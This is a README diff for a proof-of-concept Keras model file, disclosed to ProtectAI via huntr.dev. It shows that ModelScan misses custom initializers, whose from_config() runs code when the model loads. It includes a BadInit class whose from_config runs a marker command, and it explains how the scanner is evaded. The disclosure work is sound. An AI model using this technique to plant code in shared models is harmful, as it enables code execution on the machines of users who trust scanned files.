Initializer from_config bypass PoC

README.md

@@ -0,0 +1,56 @@
+---
+library_name: keras
+tags:
+- security-research
+- modelscan-bypass
+- initializer
+- from-config
+- rce
+---
+
+# ModelScan Initializer from_config Bypass — RCE via kernel_initializer
+
+## What This Is
+
+ModelScan's Keras scanners **only check Lambda layers**. All other serialized custom objects — including initializers, constraints, and regularizers embedded inside layer configs — are **completely ignored**.
+
+This .keras file uses a registered custom initializer (`MyInit>BadInit`) as the `kernel_initializer` for a Dense layer. ModelScan reports **0 Issues**. When loaded, the initializer's `from_config()` executes arbitrary code.
+
+## Verify
+
+```bash
+# 1. ModelScan says CLEAN
+modelscan -p model.keras
+# Output: Issues: 0, Errors: 0, Skipped: 0
+
+# 2. Initializer is in layer config
+python3 -c "
+import zipfile, json
+with zipfile.ZipFile('model.keras') as zf:
+    c = json.load(zf.open('config.json'))
+    init = c['config']['layers'][1]['config']['kernel_initializer']
+    print(f'class_name: {init[\"class_name\"]}')
+    print(f'registered: {init[\"registered_name\"]}')
+"
+
+# 3. Load → from_config → RCE
+python3 -c "
+import tensorflow as tf, keras, os
+@keras.saving.register_keras_serializable(package='MyInit')
+class BadInit(tf.keras.initializers.GlorotUniform):
+    @classmethod
+    def from_config(cls, config):
+        import os; os.system('id > /tmp/INIT_RCE')
+        return super().from_config(config)
+model = tf.keras.models.load_model('model.keras', safe_mode=False)
+print('RCE:', os.path.exists('/tmp/INIT_RCE'))
+"
+```
+
+## Attack Surface
+
+Initializers live inside layer configs (e.g., `kernel_initializer`, `bias_initializer`). ModelScan iterates over layers but only checks `class_name == "Lambda"`. Any registered custom initializer, constraint, or regularizer escapes detection entirely.
+
+## Disclosure
+
+Submitted to ProtectAI via huntr.dev.